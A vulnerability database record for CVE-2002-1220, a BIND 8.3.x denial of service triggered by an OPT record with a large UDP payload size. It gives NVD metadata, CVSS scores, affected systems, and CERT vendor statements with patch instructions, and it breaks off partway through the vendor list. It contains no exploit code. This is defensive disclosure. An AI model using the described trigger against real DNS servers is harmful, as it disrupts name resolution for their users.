{"id": "CVE-2002-1220", "bulletinFamily": "NVD", "title": "CVE-2002-1220", "description": "BIND 8.3.x through 8.3.3 allows remote attackers to cause a denial of service (termination due to assertion failure) via a request for a subdomain that does not exist, with an OPT resource record with a large UDP payload size.", "published": "2002-11-29T05:00:00", "modified": "2018-05-03T01:29:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1220", "reporter": "cve@mitre.org", "references": ["http://www.ciac.org/ciac/bulletins/n-013.shtml", "http://www.debian.org/security/2002/dsa-196", "https://exchange.xforce.ibmcloud.com/vulnerabilities/10332", "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A449", "http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-077.php", "http://www.securityfocus.com/bid/6161", "http://www.kb.cert.org/vuls/id/229595", "http://lists.apple.com/archives/Security-announce/2002/Nov/msg00000.html", "http://www.isc.org/products/BIND/bind-security.html", "http://marc.info/?l=bugtraq&m=103763574715133&w=2", "http://marc.info/?l=bugtraq&m=103713117612842&w=2", "http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469", "http://online.securityfocus.com/archive/1/300019", "http://www.cert.org/advisories/CA-2002-31.html", "http://online.securityfocus.com/advisories/4999"], "cvelist": ["CVE-2002-1220"], "type": "cve", "lastseen": "2021-02-02T05:19:07", "edition": 4, "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:9724"]}, {"type": "cert", "idList": ["VU:852283", "VU:844360", "VU:457875", "VU:229595"]}, {"type": "exploitdb", "idList": ["EDB-ID:22011"]}, {"type": "suse", "idList": ["SUSE-SA:2002:044"]}, {"type": "debian", "idList": ["DEBIAN:DSA-196-1:62A00"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310835099", "OPENVAS:835099", "OPENVAS:53584"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-196.NASL", "BIND_DNSSTORM.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:3754"]}], "modified": "2021-02-02T05:19:07", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2021-02-02T05:19:07", "rev": 2}, "vulnersScore": 5.5}, "cpe": ["cpe:/o:freebsd:freebsd:4.4", "cpe:/o:openbsd:openbsd:3.1", "cpe:/a:isc:bind:8.3.0", "cpe:/o:freebsd:freebsd:4.7", "cpe:/o:openbsd:openbsd:3.0", "cpe:/a:isc:bind:8.3.3", "cpe:/o:freebsd:freebsd:4.6", "cpe:/a:isc:bind:8.3.1", "cpe:/o:freebsd:freebsd:4.5", "cpe:/o:openbsd:openbsd:3.2", "cpe:/a:isc:bind:8.3.2"], "affectedSoftware": [{"cpeName": "openbsd:openbsd", "name": "openbsd", "operator": "eq", "version": "3.2"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "4.4"}, {"cpeName": "isc:bind", "name": "isc bind", "operator": "eq", "version": "8.3.1"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "4.7"}, {"cpeName": "isc:bind", "name": "isc bind", "operator": "eq", "version": "8.3.0"}, {"cpeName": "isc:bind", "name": "isc bind", "operator": "eq", "version": "8.3.3"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "4.5"}, {"cpeName": "openbsd:openbsd", "name": "openbsd", "operator": "eq", "version": "3.1"}, {"cpeName": "isc:bind", "name": "isc bind", "operator": "eq", "version": "8.3.2"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "4.6"}, {"cpeName": "openbsd:openbsd", "name": "openbsd", "operator": "eq", "version": "3.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:openbsd:openbsd:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.5:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:3.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.6:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.4:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:isc:bind:8.3.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:isc:bind:8.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:isc:bind:8.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:isc:bind:8.3.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "20021118 TSLSA-2002-0076 - bind", "refsource": "BUGTRAQ", "tags": [], "url": "http://marc.info/?l=bugtraq&m=103763574715133&w=2"}, {"name": "20021112 Multiple Remote Vulnerabilities in BIND4 and BIND8", "refsource": "ISS", "tags": ["Patch", "Vendor Advisory"], "url": "http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469"}, {"name": "oval:org.mitre.oval:def:449", "refsource": "OVAL", "tags": [], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A449"}, {"name": "DSA-196", "refsource": "DEBIAN", "tags": [], "url": "http://www.debian.org/security/2002/dsa-196"}, {"name": "N-013", "refsource": "CIAC", "tags": [], "url": "http://www.ciac.org/ciac/bulletins/n-013.shtml"}, {"name": "SSRT2408", "refsource": "COMPAQ", "tags": [], "url": "http://online.securityfocus.com/advisories/4999"}, {"name": "bind-opt-rr-dos(10332)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/10332"}, {"name": "20021115 [OpenPKG-SA-2002.011] OpenPKG Security Advisory (bind, bind8)", "refsource": "BUGTRAQ", "tags": [], "url": "http://online.securityfocus.com/archive/1/300019"}, {"name": "6161", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/6161"}, {"name": "http://www.isc.org/products/BIND/bind-security.html", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "http://www.isc.org/products/BIND/bind-security.html"}, {"name": "2002-11-21", "refsource": "APPLE", "tags": [], "url": "http://lists.apple.com/archives/Security-announce/2002/Nov/msg00000.html"}, {"name": "MDKSA-2002:077", "refsource": "MANDRAKE", "tags": [], "url": "http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-077.php"}, {"name": "CA-2002-31", "refsource": "CERT", "tags": ["US Government Resource"], "url": "http://www.cert.org/advisories/CA-2002-31.html"}, {"name": "20021112 [Fwd: Notice of serious vulnerabilities in ISC BIND 4 & 8]", "refsource": "BUGTRAQ", "tags": [], "url": "http://marc.info/?l=bugtraq&m=103713117612842&w=2"}, {"name": "VU#229595", "refsource": "CERT-VN", "tags": ["US Government Resource"], "url": "http://www.kb.cert.org/vuls/id/229595"}]}

{"osvdb": [{"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2002-1220"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-029.txt.asc)\nISS X-Force ID: 10332\n[CVE-2002-1220](https://vulners.com/cve/CVE-2002-1220)\nCERT VU: 229595\nCERT: CA-2002-31\nBugtraq ID: 6161\n", "modified": "2002-11-12T00:00:00", "published": "2002-11-12T00:00:00", "id": "OSVDB:9724", "href": "https://vulners.com/osvdb/OSVDB:9724", "title": "ISC BIND OPT Resource Record Large UDP Payload DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:44:29", "bulletinFamily": "info", "cvelist": ["CVE-2002-1220"], "description": "### Overview \n\nA remotely exploitable denial-of-service vulnerability exists in BIND. Based on recent reports, we believe this vulnerability is being actively exploited.\n\n### Description \n\nA remotely exploitable denial-of-service vulnerability exists in BIND 8.3.0 - 8.3.3. ISC's [description](<http://www.isc.org/products/BIND/bind-security.html>) of this vulnerability states:\n\n`When constucting [sic] a response a NXDOMAIN response to a ENDS query with a large UDP size it is possible to trigger an assertion.` \n \n--- \n \n### Impact \n\nThe BIND daemon will shut down. As a result, clients will not be able to connect to the service to resolve queries. \n \n--- \n \n### Solution \n\nApply a patch from your vendor. In the absence of a patch, you may wish to consider ISC's recommendation, which is upgrading to \"BIND 4.9.11, BIND 8.2.7, BIND 8.3.4 or preferably BIND 9.\" Additionally, ISC indicates, \"BIND 4 is officially deprecated. Only security fixes will be issued for BIND 4.\" \n \n--- \n \nDisable recursion if possible. \n \n--- \n \n### Vendor Information\n\n229595\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. __ Affected\n\nNotified: November 12, 2002 Updated: February 26, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAffected Systems: Mac OS X and Mac OS X Server with BIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3 \n\n\nMitigating Factors: BIND is not enabled by default on Mac OS X or Mac OS X Server \n \nThis is addressed in Security Update 2002-11-21 \n<http://www.apple.com/support/security/security_updates.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: November 12, 2002 Updated: February 24, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://ftp.support.compaq.com/patches/public/unix/v4.0g/t64v40gb17-c0028000-16638-es-20030129.README>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### IBM __ Affected\n\nNotified: November 12, 2002 Updated: December 09, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to the named and DNS resolver issues in releases 4.3.3, 5.1.0 and 5.2.0. Temporary patches will be available through an efix package by 11/22/2002 or before. The efix will be available at the following URL: \n \n[_ftp://ftp.software.ibm.com/aix/efixes/security/dns_named_efix.tar.Z_](<ftp://ftp.software.ibm.com/aix/efixes/security/dns_named_efix.tar.Z>) \n \nIn the interim, customers may want to implement the workarounds given in the Solutions section to limit their exposure. \n \nThe following APARs will be available in the near future: \n \nAIX 4.3.3 APAR IY37088 (available approx 11/27/2002) \nAIX 5.1.0 APAR IY37019 (available approx 12/18/2002) \nAIX 5.2.0 APAR TBA (available approx TBA) \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nOlder releases (6.2, 7.0) of Red Hat Linux shipped with versions of BIND which may be vulnerable to these issues however a Red Hat security advisory in July 2002 upgraded all our supported distributions to BIND 9.2.1 which is not vulnerable to these issues. \n\n\nAll users who have BIND installed should ensure that they are running these updated versions of BIND. \n \n<http://rhn.redhat.com/errata/RHSA-2002-133.html> Red Hat Linux \n<http://rhn.redhat.com/errata/RHSA-2002-119.html> Advanced Server 2.1\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### The OpenPKG Project __ Affected\n\nUpdated: November 19, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`________________________________________________________________________ \n` \n`OpenPKG Security Advisory The OpenPKG Project \n``<http://www.openpkg.org/security.html>`` ``<http://www.openpkg.org>`` \nopenpkg-security@openpkg.org openpkg@openpkg.org \nOpenPKG-SA-2002.011 15-Nov-2002 \n________________________________________________________________________ \n` \n`Package: bind, bind8 \nVulnerability: denial of service, arbitrary code execution \nOpenPKG Specific: no \n` \n`Dependent Packages: none \n` \n`Affected Releases: Affected Packages: Corrected Packages: \nOpenPKG 1.0 <= bind-8.2.6-1.0.1 >= bind-8.2.6-1.0.2 \nOpenPKG 1.1 <= bind8-8.3.3-1.1.0 >= bind8-8.3.3-1.1.1 \nOpenPKG CURRENT <= bind8-8.3.3-2002082 >= bind8-8.3.3-20021114 \n` \n`Description: \nThe Internet Software Consortium (ISC) [1] has discovered or has been \nnotified of several bugs which can result in vulnerabilities of varying \nlevels of severity in BIND [2][3]. These problems include buffer overflows, \nstack revealing, divide by zero, null pointer dereferencing, and more [4]. \nA subset of these vulnerabilities exist in the BIND packages distributed by \nOpenPKG. \n` \n` Please check whether you are affected by running \"<prefix>/bin/rpm -qa | \ngrep bind\". If you have an affected version of the \"bind\" or \"bind8\" package \n(see above), upgrade it according to the solution below. \n` \n`Workaround: \nBecause disabling recursion or disabling DNSSEC is a workaround to only a \nsubset of the aforementioned problems, it is not a recommended aproach. \n` \n`Solution: \nSince these vulnerabilities do not exist in BIND version 9.2.1, one solution \nsimply involves upgrading to it. The packages bind-9.2.1-1.1.0 in OpenPKG \n1.1 [5], and bind-9.2.1-20021111 in OpenPKG CURRENT [6] are both candidates \nin this respect. Be warned that although such later versions of BIND are \nstable, there exist large differences between BIND 8 and BIND 9 software. \n` \n` A lighter approach involves updating existing packages to newly patched \nversions of BIND 8. Select the updated source RPM appropriate \nfor your OpenPKG release [7][8][9], and fetch it from the OpenPKG FTP service \nor a mirror location. Verify its integrity [10], build a corresponding \nbinary RPM from it and update your OpenPKG installation by applying the \nbinary RPM [11]. For the latest OpenPKG 1.1 release, perform the following \noperations to permanently fix the security problem (for other releases \nadjust accordingly). \n` \n` $ ftp ftp.openpkg.org \nftp> bin \nftp> cd release/1.1/UPD \nftp> get bind8-8.3.3-1.1.1.src.rpm \nftp> bye \n$ <prefix>/bin/rpm -v --checksig bind8-8.3.3-1.1.1.src.rpm \n$ <prefix>/bin/rpm --rebuild bind8-8.3.3-1.1.1.src.rpm \n$ su - \n# <prefix>/bin/rpm -Fvh <prefix>/RPM/PKG/bind8-8.3.3-1.1.1.*.rpm \n# <prefix>/etc/rc bind8 stop start \n________________________________________________________________________ \n` \n`References: \n[1] ``<http://www.isc.org/>`` \n[2] ``<http://www.isc.org/products/BIND/>`` \n[3] ``<http://www.cert.org/advisories/CA-2002-31.html>`` \n[4] ``<http://www.isc.org/products/BIND/bind-security.html>`` \n[5] ``<ftp://ftp.openpkg.org/release/1.1/SRC/bind-9.2.1-1.1.0.src.rpm>`` \n[6] ``<ftp://ftp.openpkg.org/current/SRC/bind-9.2.1-20021111.src.rpm>`` \n[7] ``<ftp://ftp.openpkg.org/release/1.0/UPD/bind-8.2.6-1.0.2.src.rpm>`` \n[8] ``<ftp://ftp.openpkg.org/release/1.1/UPD/bind8-8.3.3-1.1.1.src.rpm>`` \n[9] ``<ftp://ftp.openpkg.org/current/SRC/bind8-8.3.3-20021114.src.rpm>`` \n[10] ``<http://www.openpkg.org/security.html#signature>`` \n[11] ``<http://www.openpkg.org/tutorial.html#regular-source>`` \n________________________________________________________________________ \n` \n`For security reasons, this advisory was digitally signed with \nthe OpenPGP public key \"OpenPKG <openpkg@openpkg.org>\" (ID 63C4CB9F) \nof the OpenPKG project which you can find under the official URL \n``<http://www.openpkg.org/openpkg.pgp>`` or on ``<http://keyserver.pgp.com/>``. To \ncheck the integrity of this advisory, verify its digital signature by \nusing GnuPG (``<http://www.gnupg.org/>``). For example, pipe this message to \nthe command \"gpg --verify --keyserver keyserver.pgp.com\". \n________________________________________________________________________ \n` \n`-----BEGIN PGP SIGNATURE----- \nComment: OpenPKG <openpkg@openpkg.org> \n` \n`iEYEARECAAYFAj3VOcwACgkQgHWT4GPEy5/vEACgmA+lr37ybByyTT7Q9ZBgzJAU \nrvMAoOZMy6lDJryPLPg1NV+Wn21wE1qA \n=gSdl \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Trustix __ Affected\n\nUpdated: November 18, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nTrustix Secure Linux Security Advisory #2002-0076 \n` \n`Package name: bind \nSummary: Remote exploit \nDate: 2002-11-15 \nAffected versions: TSL 1.1, 1.2, 1.5 \n` \n`- -------------------------------------------------------------------------- \nPackage description: \nBIND (Berkeley Internet Name Domain) is an implementation of the DNS \n(Domain Name System) protocols. BIND includes a DNS server (named), \nwhich resolves host names to IP addresses, and a resolver library \n(routines for applications to use when interfacing with DNS). \n` \n`Problem description: \nISS X-Force has found a number of problems in all BIND 8 series up to \nand including 8.2.6 and 8.3.3. Two of these can cause BIND to crash \ncausing a denial of service attack, whereas the last can be used to \nexecute arbitary code on the victim. \n` \n \n`Action: \nWe recommend that all systems with this package installed be upgraded. \nPlease note that if you do not need the functionality provided by this \npackage, you may want to remove it from your system. \n` \n \n`Location: \nAll TSL updates are available from \n<URI:``<http://www.trustix.net/pub/Trustix/updates/>``> \n<URI:``<ftp://ftp.trustix.net/pub/Trustix/updates/>``> \n` \n \n`About Trustix Secure Linux: \nTrustix Secure Linux is a small Linux distribution for servers. With focus on \nsecurity and stability, the system is painlessly kept safe and up to date \nfrom day one using swup, the automated software updater. \n` \n \n`Automatic updates: \nUsers of the SWUP tool can enjoy having updates automatically \ninstalled using 'swup --upgrade'. \n` \n` Get SWUP from: \n<URI:``<ftp://ftp.trustix.net/pub/Trustix/software/swup/>``> \n` \n \n`Public testing: \nThese packages have been available for public testing for some time. \nIf you want to contribute by testing the various packages in the \ntesting tree, please feel free to share your findings on the \ntsl-discuss mailinglist. \nThe testing tree is located at \n<URI:``<http://www.trustix.net/pub/Trustix/testing/>``> \n<URI:``<ftp://ftp.trustix.net/pub/Trustix/testing/>``> \n` \n \n`Questions? \nCheck out our mailing lists: \n<URI:``<http://www.trustix.net/support/>``> \n` \n \n`Verification: \nThis advisory along with all TSL packages are signed with the TSL sign key. \nThis key is available from: \n<URI:``<http://www.trustix.net/TSL-GPG-KEY>``> \n` \n` The advisory itself is available from the errata pages at \n<URI:``<http://www.trustix.net/errata/trustix-1.2/>``> and \n<URI:``<http://www.trustix.net/errata/trustix-1.5/>``> \nor directly at \n<URI:``<http://www.trustix.net/errata/misc/2002/TSL-2002-0076-bind.asc.txt>``> \n` \n \n`MD5sums of the packages: \n- -------------------------------------------------------------------------- \n7ca823f5bdcda62354971ba527659f8f ./1.1/RPMS/bind-8.2.6-2tr.i586.rpm \n97e22862a18c94181f004b2961474a61 ./1.1/RPMS/bind-devel-8.2.6-2tr.i586.rpm \n1b3924c34061398f64906a41bc4e103e ./1.1/RPMS/bind-utils-8.2.6-2tr.i586.rpm \n9b353d2f2beef989a4d34fa9fd04cc30 ./1.1/SRPMS/bind-8.2.6-2tr.src.rpm \n979d763efbec95a6104b8df307a52ab2 ./1.2/RPMS/bind-8.2.6-2tr.i586.rpm \na219f2f92ea9f4cccb74c4ac9fcc8f69 ./1.2/RPMS/bind-devel-8.2.6-2tr.i586.rpm \ncc97ab8e12caaff576063d150d7216e7 ./1.2/RPMS/bind-utils-8.2.6-2tr.i586.rpm \n9b353d2f2beef989a4d34fa9fd04cc30 ./1.2/SRPMS/bind-8.2.6-2tr.src.rpm \naa38424ba1671b811aec3265e3764390 ./1.5/RPMS/bind-8.2.6-2tr.i586.rpm \n74a18eed135150b64f62fb398d823175 ./1.5/RPMS/bind-devel-8.2.6-2tr.i586.rpm \n74b1f15664668fcfa0da9b52f55d7745 ./1.5/RPMS/bind-utils-8.2.6-2tr.i586.rpm \n9b353d2f2beef989a4d34fa9fd04cc30 ./1.5/SRPMS/bind-8.2.6-2tr.src.rpm \n- -------------------------------------------------------------------------- \n` \n \n`Trustix Security Team \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE92NuHwRTcg4BxxS0RAraRAJ0Q+GDhIUUv0gbgv91q1ZmnFqkTHACfaRST \nKUB6bSTouOiksfknm0Mc/6I= \n=brw5 \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### MontaVista Software __ Not Affected\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMontaVista ships BIND 9, thus is not vulnerably to these advisories.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Nominum __ Not Affected\n\nUpdated: November 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNominum \"Foundation\" Authoritative Name Server (ANS) is not affected by this vulnerability. Also, Nominum \"Foundation\" Caching Name Server (CNS) is not affected by this vulnerability. Nominum's commercial DNS server products, which are part of Nominum \"Foundation\" IP Address Suite, are not based on BIND and do not contain any BIND code, and so are not affected by vulnerabilities discovered in any version of BIND.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Xerox Corporation __ Not Affected\n\nNotified: November 12, 2002 Updated: May 30, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nA response to this advisory is available from our web site: <http://www.xerox.com/security>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### 3Com Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### AT&amp;T Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Adns Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Aks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Alcatel __ Unknown\n\nNotified: November 12, 2002 Updated: February 25, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nFollowing CERT advisory CA-2002-31 on security vulnerabilities in the ISC BIND implementation, Alcatel has conducted an immediate assessment to determine any impact this may have on our portfolio. A first analysis has shown that the following products (OmniSwitch 6600, 7700, 8800) may be impacted. Customers may wish to contact their support for more details. The security of our customers' networks is of highest priority for Alcatel. Therefore we continue to test our product portfolio against potential ISC BIND security vulnerabilities and will provide updates if necessary.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Apache Software Foundation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Avaya Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### BSDi Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### BlueCat Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Check Point Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Cisco Systems Inc. 